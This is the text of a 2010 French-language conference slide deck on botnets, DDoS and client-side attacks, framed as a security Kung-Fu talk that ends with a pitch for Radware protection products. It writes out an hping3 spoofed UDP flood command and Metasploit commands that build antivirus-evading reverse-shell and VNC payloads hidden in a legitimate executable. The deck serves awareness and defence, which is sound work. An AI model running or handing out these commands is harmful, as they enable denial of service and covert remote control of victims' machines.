Maîtriser l’art du Kung-Fu
19 octobre 2010
Colloque québécois de la sécurité de l'information(CQSI)
Michel Cusin, Architechte Sécurité BellJocelyn Rainville, SE Radware
Slide 2
Agenda
• Maîtriser l’art du Kung-Fu ???
• Server-side Attacks “Attaques traditionnelles”
• Client-side Attacks “Nouvelle tendance”
• Démonstrations
• Conséquences
• Solutions
Slide 3
Kung-Fu
Slide 3
• Kung-Fu qui signifie art martial, vient de la nécessité de légitime défense.
• Les termes "Kung" et "Fu" traduits littéralement et séparément ont une signification différente:
• "Kung" désigne la "maîtrise", le "perfectionnement".
• "Fu" désigne les techniques en tant que contenu.
Comment se porte votre Kung-Fu en sécurité ?
• Kung-Fu en sécurité -> Maîtrise des techniques en sécurité.
Mais qu’est-ce que le Kung-Fu?
Slide 4
Samouraï vs Ninja
vs
Samouraï Ninja
Slide 5
Samouraï vs Ninja
Qu’ont-ils en communs?
Ils maîtrisent leur art…
• Ils maîtrisent leurs techniques.
• Ils maîtrisent leurs armes.
• Ils maîtrisent leurs spécialités.
• Ils défendent ce en quoi ils croient.
Slide 6
Professionnels de la sécurité vs Pirates
vs
(Samouraï) (Ninja)
Slide 7
Qu’avons-nous en communs?
• Maîtrise des techniques
• Utilisation des outils
• Connaissances
• Objectifs
Maîtrisons-nous notre art ?
Professionnels de la sécurité vs Pirates
Slide 8
Server-side Attacks
Server-side Attacks “Attaques traditionnelles”
Slide 9
Qu’est-ce qu’un Botnet
Bot
Bot
BotC&C
Bot
Pirate
Victime
Slide 10
Botnet à louer (IMDDOS)
• Botnet « commercial »
•10 000 nouvelles victime par jour
• Propagation (peer-to-peer)• Windows 7 crack• Autres noms attrayants
• Portail « libre-service »
• Support 7/24
• Made in China
Source: http://www.damballa.com/IMDDOS/
Slide 11
Les Botnets: Le Québec n’y échappe pas
Botnet: RTSS (Réseau de Télécommunication Sociaux Sanitaire)
• Le bot de la St-Valentin (14 Février 2007)• Le bot était transporté par un ver• Réseau paralysé• Au moins l’auteur s’est excusé…
Botnet: Opération Basique
• Février 2008• Plus de 100 pays sont touchés, sur tous les continents. • 17 arrestations (de 17 à 26 ans dont 3 mineurs)• Débût de l’enquête: Été 2006 Source: http://www.sq.gouv.qc.ca/salle-de-presse/communiques/demantelement-reseau-pirates-informatiques-2008.jsp
Slide 12
Qu’est-ce qu’un DDoS
DDoS: Distributed Denial of Service
(Déni de service distribué)
Slide 13
Démonstration DDoS
Simulation d’un DDoS(Avec une seule machine)
Hping3 –udp –flood –rand-source -p 80 [IP Serveur Web]
Defense Pro
Slide 14
L’envers de la médaille…
Slide 15
“Client-side attacks”
Client-side Attacks: La nouvelle tendance
Slide 16
Création d’un “Client-side attacks”
Metasploit Social Engineer Toolkit (SET)
Ultimate EXE Packer (UPX)
Slide 17
Metasploit
Le “framework” Metasploit est un outil pour le développement et l'exécution d'exploits contre une machine distante.
VNCINJECT:./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
Meterpreter:./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
Slide 18
VirusTotal
Plus de 40 antivirus différents…
Slide 19
Camouflage du “malware”
Le Ninja maîtrise l’art du camoufflage…
Slide 20
Attention!
Slide 21
Posez-vous la question
~300
Vulnérabilités découvertes et documentés au cours des 3 dernières années:
~90
~200
Sources: http://nvd.nist.gov/ et http://osvdb.org/
Est-ce que votre stratégie de mise à jour inclue ces produits? Vraiment…?
Slide 22
Scénario d’un “client-side attack”
Connexion en sortie:
Port TCP 80 (HTTP) ou 443 (HTTPS)
DefensePro
Serveur
Victime
Coupe-feuPirate
Environnement corporatif
VNCINJECT:./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
IPS: Protection par signatures statiques
• Procure une protection contre:
– Vers, Bots, Trojans, Hameçonage, logiciels espions
– Web, courriel, SQL, VoIP (SIP), vulnérabilités DNS
– Proxy anonymiseur, attaques IPv6
– Vulnérabilités Microsoft– Anomalies de protocol
• Protection par signatures:
– Équipe de pointe de recherche en sécurité
– Protection contre l’exploitation des vulnérabilités connues
– Mise à jour hebdomadaire et d’urgence des signatures
Slide 23
Protection DDoS : Signatures en temps réel
• Protection par signature créées automatiquement en temps réel contre les attaques DDoS réseau:– SYN floods;
– TCP floods;
– UDP/ICMP floods.
• Proposition de valeur– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 24
Network Behavioral Analysis: Real-time Signatures Protection
• L’Analyse Comportementale Réseau (NBA - Network behavioral analysis) détecte les transactions anormales au niveau des utilisateurs ainsi que des applications.
• Protection par signatures automatiques en temps réel contre:– Propagation de logiciel malveillant “Zéro-minute”
– Mauvaise utilisation des ressources d’applications comme:• Attaques de type “Brute force”• Balayages d’application Web• Inondations (floods) de page HTTP• Balayages SIP• Inondations (flood) SIP
• Proposition de valeur– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 25
Slide 26
Une question d’équilibre
Conclusion
C’est une question d’équilibre
ConnaissancesTechnologies
Slide 27
Questions?
La présentation sera disponible sur le site du CQSI ainsi que sur http://cusin.ca
Questions?
Coupon pour le tirage d’une formation SANS gratuite en français:
Détection de pirates informatiques pour administrateurs de systèmes
Info sur http://www.sans.org et sur http://cusin.ca
Recommended